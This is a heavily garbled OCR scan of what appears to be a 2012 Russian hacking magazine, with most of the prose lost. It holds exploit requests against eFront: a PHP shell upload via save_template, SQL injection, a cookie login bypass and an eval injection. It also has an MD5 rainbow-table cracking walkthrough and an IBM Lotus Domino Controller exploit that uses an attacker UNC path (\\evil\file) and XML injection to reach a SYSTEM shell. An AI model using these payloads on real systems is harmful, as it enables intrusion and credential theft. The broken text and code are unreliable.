    IJ:J4!Jii /fws/addons/ t i m e/j sc i t s/t i _ m 1 1 u g i s/ j f i 1 ma g 1 j _ s ave _ name.php, 37-56

    . $selectedDocuments POST - value.

    $selectedDocuments displayAayll witelnfoll, , $selectedDocuments.

    witelnfoll , /fws/addons/ t i m /j s i t s/t i _ m / 1 u g i s/ j f i 1 ma g 1 j _ t _

    folde.php:

    function writeinfo($data, $die = false) {

    $fp = @fopen(dirname( __ FILE __ ) . DIRECTORY_SEPARATOR . 'data.php' , 'w+' );

    @fwrite($fp, $data);

    057 www.epidemz.net

  • /

    GetUserTimeTargetll

    @fwrite($fp, "\n\n" date( 'd/M/Y H:i:s' ) ); @fclose($fp);

    ! data.php, -. ex pl oit- db .com !EDB-10: 18111]. ,

    .

    , , :

    11 Arch Li nux # pacman -5 php

    / / Debian- based # apt-get install php

    :

    $ php 18111.php

    - , - WodPess. , Joomla!, - CONFIG_SYS_ROOT_PATH.

    if1;1d:Jfi Wodpess Zigii Web Shop Plugin 0.9.12 2.2.3.

    fil!iijiB' 2.2 .4 .

    '

    eFront

    CVSSV2 ~5 111111 1111 111 11 111111 1111

    [AV: N/AC:L/Au: N/C:P/1: /:] IIJj]

    EgiX eFont. , , .

    f:JQ!Iii 1. .

    /www / d i to /t i ny _ m / 1 ug i s/save _ te m 1 te/s ave _ te m 1 te. h ! 8-18]:

    058

    if ($_POST[ 'templateName' ]) { $dir = ' .. / . / .. / .. /content/editor_templates/' .

    $_SESSION[ 's_login' ]; if (!is_dir($dir) && !mkdir($dir, 8755 )) {

    throw new Exception(_COULDNOTCREATEDIRECTORY);

    $filename = $dir. '/' .$_POST[ 'templateName' ]. '.html' ; $templateContent = $_POST[ 'templateContent' ]; if (file_exists($filename) === false) {

    $ok = file_put_contents($filename, $templateContent);

    chmod($filename, 8644);

    , file_put_ contents() $_POST[ 'templateName' ] $_ POST[ 'templateContent' ] , . ,

    , , php, magic_quotes_gpc. , , :

    POST /efront/www/editor/tiny_mce/plugins/ save_template/save_template.php /1.1

    Host: localhost Content-Length: Content-Type: application/x-www-form-urlencoded Connection: keep-alive templateName=sh.php%ee&templateContent= < ?php evil_code(); ?>

    2. . checkFile[], /libaies/filesystem. class.php, 3143-3154

    . FileSystemTee::uploadFile!l, , hkFil[]

    . , , file_ack_list,

    php, php3, jsp, asp, cgi, pl, , , bat.

    php.

    3. SQL- UPDATE. getUseTimeTaget[], /libaies/ tools.php : .

    , package_l , $entity. , /www/

    peiod ic_ u pdate.php:

    if ($_5ESSION[ 's_login' ]) { $entity = getUserTimeTarget($_GET[ 'HP_REFERER' ]); //$entity = $_5ESSION['s_time_!arget ' ] ; //Update times for this entit y $result = eF_executeNew( "update user_times set time=time+("

    . time(). "-timestamp_now),timestamp_now="

    . time(). "lr.tlere session _ expired = and session _ custan_ identifier = $_5ESSIDN[ 's_custom_identifier' ]. "' and users_LOGIN = '" . $_SESSION[ 's_login' ]. "' and entity = '" . current($entity). "'and entity_id key($entity). "'" );

    01 /156/2012 www.epidemz.net

  • , $_G[' _REFERER'], getUseTimeTagetl l ,

    eF _executeNew ll . ,

    SQL- URL :

    http:/ / localhost/efront/www/periodic_updater.php? HTTP_REFERER=http://host/?package_ID=[SQL]

    $_SERVER('HP _REFER ER '], , -,

    . .

    4. . /www/index.php:

    if (isset($_COOKIE[ 'cookie_login' ]) && isset($_COOKIE[ 'cookie_password ' ]))

    try { $user = EfrontUserFactory :: factory(

    $_COOKIE[ 'cookie_login ' ]); $user - > login($_COOKIE[ 'cookie_password ' ], true);

    $_COOKIE['cookie_login'J. EfontUserFactory::factoyll,

    , :

    GET /efront /www/index.php /1.1 Host: localhost Cookie: cookie_login=admin;cookie_login=1;cookie_ login=administrator;cookie_login=1;cookie_password=1 Connection : keep-alive

    5. -. /www/s tudent.php:

    if (isset($_GET[ ' course' ]) 11 isset($_GET[ 'from_course' ]))

    if ($_GET[ 'course' ])

    }

    $course new EfrontCourse($_GET[ 'course ' ]); else {

    $course new EfrontCourse($_GET[ ' from_course' ]);

    $eligibility = $course - > checkRules( $_SESSION[ ' s_login' ]) ;

    , $_GET['couse'] $_GE['from_ couse'J. EfrontCourse, , evalll :

    /s tudent.php?lessons_ID=1&course[id]=1&course [directions_ID]=1&course[rules]=a: 1 :{s: 19 : "1]; phpinfo();die; /* " ;a: 1 :{s: : "lesson" ;i : e ;}}

    if.1;1dJt1 Ft

  • I Radeon 4850 2 n

    2,2 !

    n MD5 n n

    .

    bjt.Jy/yEhdi -

    RainbowCack n n ! .

    bjt.[y/viSB9K -n ~> .

    [iog.chivavas.org[

    n n MD5.

    , . -, ,

    ,

    . , , MD5. .

    :

    , . , .

    . -

    l l , . .

    MD5.

    MD5 1 28- . , 1 28- , . 1991

    - MD4. 1992 RFC 1321. MD5 , CMS

    - SSL-. , MD5 , 1993 .

    , . , 1996-, , MD5. , ,

    SHA 1 [ , , SHA21 RIPEMD-160.

    MD5 1 2004 . CetainKey Cyptosystems MD5CRK -

    . - . 24 2004 , - ,

    01 /156/20 12 www.epidemz.net

  • ~ ' ( ' 'jiJI:fl(,(; ,,

    '" " . ~

    " 1 -~' 4 t.'1 ),J ., f lt, ' !1: . 1 l't ~

    ;t (.,J ~ "'

    1.' ~ ili \!

  • - - ..

    l! ~t b Pl l illtt llt

    ~ 16(t6)c: t0 t1t.72fOc:t!d6~c:99 !110 11t4.S:p.fi blj bb7a!45140~ 503t!3ecc:Et!tt533bll R.) bHc:07bc:073!1!5t!!1Hd15H841tb 49!.:61 0 o~ t70c:6datd72c:561at7dsttc:to 6c!sl oe ~htp2 ftl 7 !I)t2fd142212C.H99!d05ttt8b9H d04:ny2V

    pltintt rc:ot 16Et6Sc:t041 a72!0c: t!di79!c:99 fd0 1s de45;:'16 pltltlttltt of 7t!45H0450b31 !38c:c:6!!t~533blt 11 dHht UO pl l iflttat c f bHc:0~013fi8518!4!dt SH84ltb is p49!r.67

    pla illtet ot 02470

  • Linux . n : LN/ NTLM, MD5 SHA1. , - .

    > . 3 MD5, SHA1, LM NTLM.

    , >> . : LN/NTLM, MD5 SHA1- 200 . .

    tg, RainbowCack. n :

    hash_algoithm-aop [LM, NTLM, MD5 SHA1);

    chaset- , chaset . txt;

    plaitext_le_m i plaintext_len_max- ; tae_idex, chain_le, chain_um t_ind- , [it.ly/dT8M).

    n: 1. tae_index- >> ,

    . , .

    2. chain_le- n . 3. hin_um- n . 4. pat_index-o , .

    [ 0). >> MD5:

    rtgen.exe md5 loweralpha-numeric 1 7 zeee 9755489

    , . ltel Atom N450

    :). md5_ lowealpha-numeic#1-7 _0_200097505489 _.t 1,5 .

    , . n

    tsot.exe:

    rtsort.exe md5_loweralpha-numeric#l-7_e_zeeex975e5489_e.rt

    l . : d8578edf8458ceefbc5ba58c5ca4. cack_gui.exe

    Add Hash ... File . . >> . Seach Rainbow s ... Rainbow .

    , md5_loweralpha-numeric#l-7_e_zeeex975135489_e.rt, Open. n !

    .

    VS. CPU VS. GPU , , lghashgpu n D5- , , RainbowCack

    01/156/2012

    MD5

    >> . n.

    MDCack, CPU [ ).

    GPU [nVidia GeFoce GT 220), CPU [lntel Atom N450, ) ~

    GPU CPU 4 ee:ee:el ee :ee:el ::l 5 :: : :9 : :l

    ::l ee:es:21 : : 1 7 ee::ll 9:27:52 ::4

    , CPU , GPU >> . , ,

    . , , 4- 5- ,

    n . ,

    . , - .

    . -, , MD5 SHA1. - SHA2 S

    [ ). -, .

    >> . - , . , 100 %, . ::::

    063 www.epidemz.net

  • EJ Plugtns RDP ots tist

    Ftles .-6 setttnas

    Hack the Planeti

    www.epidemz.net

  • Spy .... f! Anti.&i..Rud

    FF -binjW: Q Op

  • www.epidemz.net

  • Spy ... , Installer

    ----------conflo.php -------------,

    -

    -(forCP):

    ll'!y5QL

    lnl itle :~CN" "Your JavaSctipt ls tumed off. Please, enaieyoo >o:::'c:J:::s_ ---:--'=:...:;:= ,. .,...., ._~ID.ot--1

    ~- ( III .. ">!.J18)' ) YDUI"Javakrlplla lwodorf. PI8aaa , a~.yowJ&.,...a, a"*~~..-: con.

    to[y- e.-ano,t;rt~ -Co~"'",..JI*""'

    ~ ( IINI8t1o011!YC.I'P8"'"'Y ) YowJavaScriptl8t .. .,.dofi. Piea , anablly-JS ~h l P18a. an111 .. ..-. -~ntf-CO811nl:ti'J'~"J' (

    Y-JavaSc.pel8t,.Ndotf. PI8"a, ana. v-Js Plea , e~~terp.~oword WWWI'IDVI\1~ l ,twJt,oonl

    intitle:"CN" "YourJavaSaipt ls tumed off. Please. e~bl!_~ ~

    www.epidemz.net

  • , Digital Security ltwitter.com/asin tsovl

    Lotus,

    IBM Lotus Domino Server -

    IBM Lotus Software,

    IBM Lotus Notes.

    www.zerodayiitia tive.com - ZD I; www:ii)m.com/soft-ware/ru/lotus/ -IBM Lotus Software; buatraq.ru - BugTraq; dj .navexDress.com -DJ Java Decompiler. LOTUS DOMINO CONTROLLER , , , .

    .

    . IBM, . , , Lotus. . . Lotus

    : , , . . , ,

    . , , , .

    Lotus . : ] - , , ames.nsf - .

    , , Lotus 8.5.2FP2. , exploit-db.com .

    BugTaq , ZDI, IBM suit- . , , ,

    068

    . ,

    , . . - , .: ]

    CVE-2011-1519 , ,

    [ , ]. , ZDI ZDI-11-110,

    Oday ( ]. :

  • . .

    UNC, . , SYSTEM>>.

    : ~ COOKIEFILE

    , \\evi lhost\passwod_coo kie_file, . , , . .

    , , 2050. , Lotus . .

    , . , ,

    , nmap.

    Ltus-, , ,

    . :

    socket:reconnect_ssl()

    socket:send( "#API\n" ) socket:send( ( "#UI %s,%s\n " ):format(user,pass) socket:receive_lines( l )

    socket:send( "#EXI\n" )

    , Ltus- : SSL- ,

    #>>. , admin pass

    #UI admin,pass. , , nmap

    COOKIEFILE . , , #COOKIEFILE \\evil\ file. , , [ ,

    ! .

    - . , Java, IDA , - . DJ decompile [membes.

    Nt-

    01 /156/2012

    Lotus,

    fotunec i ty. com/neshkov/dj . htm l l, j- :\ gm Files\IBM\Lotus\Domino\Data\domino\java\dconsole.ja n Jv- . , NewCiient.class, .

    :

    11 sl- 2ese/tcp if(sl.equals( "#EXIT" ))

    return 2;

    i f (sl. equals( "#COOKIEFILE" )) if(stringtokenizer.hasMoreTokens())

    11 . : // #COOKIEFILE < n >

    cookieFilename = stringtokenizer.nextToken().trim(); return 7;

    if(! l.equals ( "#UI" )) if(stringtokenizer .hasMoreTokens())

    11 ... usr = stringtokenizer.nextToken( "," ).trim();

    if (usr == null) return 4 ;

    if(stringtokenizer.hasMoreTokens()) 11 , pwd = stringtokenizer.nextToken().trim();

    return ;

    . :

    /* */ do{

    / / ReadFromUser- int i = ReadFromUser();

    if(i == ) { // #APPLET appletConnection = true ; continue;

    userinfo = UserManager.findUser(usr); if(userinfo == null) {

    /1 . .. ! WriteToUser( "NOT_REG_AOMIN" ); continue;

    if(!appletConnection) // #APPLET, fiag=vrfyPwd.verifyUserPassword(pwd,userinfo.userPWD());

    else // #APPLET / 1 COOKIE? !

    fiag = verifyAppletUserCookie(usr, pwd);

    } while ( true); // end loop if(fiag) // ,

    // , !

    , #APPLET #UI #COOKIEFILE. , , ,

    069 www.epidemz.net

  • admindata.xml. , no n, [ NOT_REG_ADMIN !' whoami NT AUTHORITY\SYSTEM

    C:\Lotus\Domino\data>

    n , n n . , n #API , API Jv-, -

    , ncat . , Lotus , n SMBRelay.

    ? , . ?

    , -. -,

    c-..-.. ~no

    '" ........... C'adlf.Ctt.&........Joo Lqou-os.Fn,OJOcc:OII c ... ,..nw,_,...

    C...tllll~ll:

    ..._, L.,~ D~l'1to ,07 0c

  • S- ? , , UNC ( , !.

    , - . , IBM

    , : cookiefile .>> . ,

    - \\evil\cookie\file, , : .\\evil\cookie\ file, UNC . , SSL-,

    . . IBM! , cookief ile,

    , - L- L- . XM L,

    ' , , IBM, L- :

    c ?xml version= "1 . 0" encoding= "UTF-8" ?> cuser name= "admin" cookie= "dsecrg" address= "dsecrg" >

    :

    Bla-a-acuser name= "admin" xXXxcookie= "dsecrg"Xaddress= " dsecrg"NYA>

    >>

    . : 1. cookievalues Microsoft I

    service ( \\n- Entel:

    ncat targethost 49152 GET /

  • Mar licq 884888, http://snipper.rul

    ,., .. , ... ....

    : scarletO URL: bit .ly/t l56m2 :

    """"' .... Windows

    -

    MSSQL lnjection Helper- , n SQL-

    . ,

    n MSSQL. ,

    n n n SQL-.

    : Microsoft SQL Server; GUI-

    ;

    ; ; , ;

    n ; ;

    ;

    . , ' MSSQL lnjection Helper

    , , URL [, site .com/script.asp?id =11 .

    072

    :

    URL:

    3. 14.y/r u/md5 : Win dows

    D5-

    ?

    BarsWF- World Fastest MD5 cracker.

    n , 5-

    . ? npor : +

    ; + -

    n; + ;

    MD5; ; . u :

    1. . n, lntel 2 Quad QX6700 [3,01 GHzl

    200 n '

    2. Radeon: